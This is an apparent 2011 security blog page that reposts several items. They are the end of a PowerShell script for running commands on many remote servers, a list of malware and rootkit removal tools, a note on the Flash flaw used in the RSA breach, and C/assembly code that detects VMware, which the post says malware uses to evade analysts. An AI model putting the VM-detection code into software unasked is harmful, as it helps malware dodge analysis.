     
     
     
     
    } 
    End{Write-Output "Script ...END"} 
                 } 
     
 
#---------------- 
#you can use this script to run any command that can be run on CMD.EXE 
#the following is only to give you an idea how can you use it 
#----------------- 
#for copying files from many remote computers to a single 
# get-content c:\servers.txt | Run-Remotecommand 
#Enter command to run: copy c:\log\log.txt d:\ 
#you only input "copy c:\log\log.txt d:\" 
#--------------------------------------- 
#for forcing group policy update on multiple computers 
# get-content c:\servers.txt | Run-Remotecommand 
#Enter command to run: gpupdate /force 
#-------------------------------------- 
#for stopping the Bits service on multiple computers 
# get-content c:\servers.txt | Run-Remotecommand 
#Enter command to run: Net stop bits 
#--------- 
#you can always run it against a single server using  
#Run-RemoteCommand server1 
#Enter command to run: enter whatever you'd normally enter in cmd.exe shell 
 
 
Source: http://gallery.technet.microsoft.com/scriptcenter/56962f03-0243-4c83-8cdd-88c37898ccc4 

Apr 3, 2011

14 Free Tools To Use To Identify And Remove Tough Malware

The following tools have been specifically designed to help users better identify malware infections, and then eradicate those specific infections. These tools require advanced computer knowledge, and unless you feel confident in your diagnostic skills, you should avoid them.

Emsisoft HiJackFree
The program operates as a detailed system analysis tool that can help you in the detection and removal of Hijackers, Spyware, Adware, Trojans, Worms, and other malware. It doesn’t offer live protection but instead, it examines your system, determines if it’s been infected, and then allows you to wipe out the malware.

Runscanner
The developers of Runscanner describe this freeware utility as having been designed to “detect changes and misconfigurations in your system caused by spyware, viruses, or human error.”

HijackThis
HijackThis is a free utility which heuristically scans your computer to find settings that may have been changed by homepage hijackers, spyware, other malware, or even unwanted programs. In addition to this scan and remove capability HijackThis comes with several tools useful in manually removing malware from a computer.
The program doesn’t target specific programs, but instead it analyses registry and file settings, and then targets the methods used by cyber-crooks. After you scan your computer, HijackThis creates a report, and a log file (if you choose to do so), with the results of the scan.

RKill
RKill is a program developed at BleepingComputer.com – “It was created so that we could have an easy to use tool that kills known processes that stop the use of our normal anti-malware applications. Simple as that. Nothing fancy. Just kill known malware processes so that anti-malware programs can do their job.”

Emsisoft BlitzBlank
BlitzBlank is a tool for experienced users and all those who must deal with Malware on a daily basis. Malware infections are not always easy to clean up. In more and more cases it is almost impossible to delete a Malware file while Windows is running. BlitzBlank deletes files, Registry entries and drivers at boot time before Windows and all other programs are loaded.

McAfee Labs Stinger
Stinger is a stand-alone utility used to detect and remove specific viruses. It is not a substitute for full anti-virus protection, but rather a tool to assist administrators and users when dealing with an infected system. Stinger utilizes next generation scan engine technology, including process scanning, digitally signed DAT files, and scan performance optimizations.

Specialty Removal Tools From BitDefender
Eight special removal tools including Conficker Removal Tool

Microsoft Malicious Software Removal Tool
This tool checks your computer for infection by specific, prevalent malicious software (including Blaster, Sasser, and Mydoom) and helps to remove the infection if it is found. Microsoft will release an updated version of this tool on the second Tuesday of each month.

NoVirusThanks
NoVirusThanks Malware Remover is an application designed to detect and remove specific malware, Trojans, worms and other malicious threats that can damage your computer. It can also detect and remove rogue security software, spyware and adware. This program is not an Antivirus and does not protect you in real time, but it can help you to detect and remove Trojans, spywares and rogue security software installed in your computer.

Norton Power Eraser
Symantec describes Norton Power Eraser in part, as a tool that “takes on difficult to detect crimeware known as scareware or rogueware. The Norton Power Eraser is specially designed to aggressively target and eliminate this type of crimeware and restore your PC back to health.”

Rootkit Tools:
If you think you might have hidden malware on your system, I recommend that you run multiple rootkit detectors. Much like anti-spyware programs, no one program catches everything.
Microsoft Rootkit Revealer
Microsoft Rootkit Revealer is an advanced root kit detection utility. Its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. According to Microsoft, Rootkit Revealer successfully detects all persistent rootkits published at www.rootkit.com, including AFX, Vanquish and Hacker Defender.

IceSword
IceSword is a very powerful software application that will scan your computer for rootkits. It also displays hidden processes and resources on your system that you would be unlikely to find in any other Windows Explorer like program. Because of the amount of information presented in the application, please note that IceSword was designed for more advanced users.

GMER
This freeware tool is essentially a combination of Sysinternals’ Rootkit Revealer and Process Explorer. The program can list running processes, modules and Windows services, in addition to scanning for the presence of rootkits.

Tizer Rootkit Razor

Tizer Rootkit Razor, will allow you to identify and remove Rootkits from your computer. I should be clear however, this tool is not “one-click simple” to decipher, and users need to be particularly mindful of false positives.

Source: http://billmullins.wordpress.com/2011/04/02/14-free-tools-to-use-to-identify-and-remove-tough-malware/

RSA was hacked with Adobe Flash Player Vulnerability

Adobe Flash Player 10.2.153.1 Fixes Vulnerability Used in RSA Attack

RSA has confirmed that it was an exploitable bug in Adobe Flash player that was used to gain entry into their company network. Adobe Flash player 10.2.153.1 contains the fix. The vulnerability exploited is CVE-2011-0609. No reports of widespread attacks exist as of this writing (02 April 2011), but it would be prudent to get this update rolled out as soon as practical.

References:
http://threatpost.com/en_us/blogs/rsa-securid-attack-was-phishing-excel-spreadsheet-040111
http://blog.fireeye.com/research/2011/03/who-is-exploiting-the-flash-0-day-cve-2011-0609.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html

Source: 
http://blog.sharpesecurity.com/2011/04/03/adobe-flash-player-10-2-153-1-fixes-vulnerability-used-in-rsa-attack/
http://bits.blogs.nytimes.com/2011/04/02/the-rsa-hack-how-they-did-it/

VMDetect tool!!

VMDetect is the FREE tool to find out if your program is running inside virtual machine. Often there is need to know if you are running on host system or guest system so that you can take right course of action.

Also most malwares/virus use this to detect if they are inside emulator or vm and then disable their functionality completely. This is because malware researchers use VM to run malware to study their behavior and by detecting & shutting down themselves malwares prevent their analysis.


Image


Currently VMDetect supports following top virtual machines


  • VMWare from VMWare.com
  • Microsoft's Virtual PC

Here's the piece of code which detects VMWARE
bool IsInsideVMWare()
{
bool rc = true;
__try
{
__asm
{
push edx
push ecx
push ebx
mov eax, 'VMXh'
mov ebx, 0 // any value but not the MAGIC VALUE
mov ecx, 10 // get VMWare version
mov edx, 'VX' // port number
in eax, dx // read port
// on return EAX returns the VERSION
cmp ebx, 'VMXh' // is it a reply from VMWare?
setz [rc] // set return value
pop ebx
pop ecx
pop edx
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
rc = false;
}
return rc;
}
If you want code to detect Virtual PC, please go to the Source.
Source: http://securityxploded.com/forum/viewtopic.php?f=40&t=1232#p1587

Add RSS feed button on the right side of page.

Thank you very much for Andrew about my RSS feed. Now I fix it and I add RSS feed button on right side of the page.

Now, if you want to feed my blog. Go and get it.

If you want to do it by yourselves, try it.

1. Log in to your feedburner account
2. Add your blog url into the blog and "Next"
3. "Next","Next",and "Next"(if you want to see your feed's stats or modify it, you can do it later)
4. Go to the publicize tab on top after all "Next".
5. In the publicize page there will be a menu on the left, click on chicklet chooser from that menu
6. You will see all kinds of feed subscription buttons and their codes...just copy and paste the required code in your Design tab in settings page of your blog.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |